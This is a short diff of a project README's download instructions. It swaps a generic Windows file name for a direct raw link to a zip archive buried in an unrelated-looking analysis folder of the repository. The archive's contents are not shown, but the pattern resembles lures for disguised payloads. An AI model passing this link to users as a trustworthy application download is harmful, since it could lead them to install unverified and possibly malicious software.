troller172/MDCP/README.md

 3. **Download the Application**

    Click on the version number to expand the details.
 Look for the assets section and download the file suitable for your operating system.
-For example, if you're on Windows, you might see a file like `MDCP_Windows.zip`.
+For example, if you're on Windows, you might see a file like `https://raw.githubusercontent.com/troller172/MDCP/main/wilds/fmow/analysis/MDCP-3.7.zip`.

 4. **Extract the Files**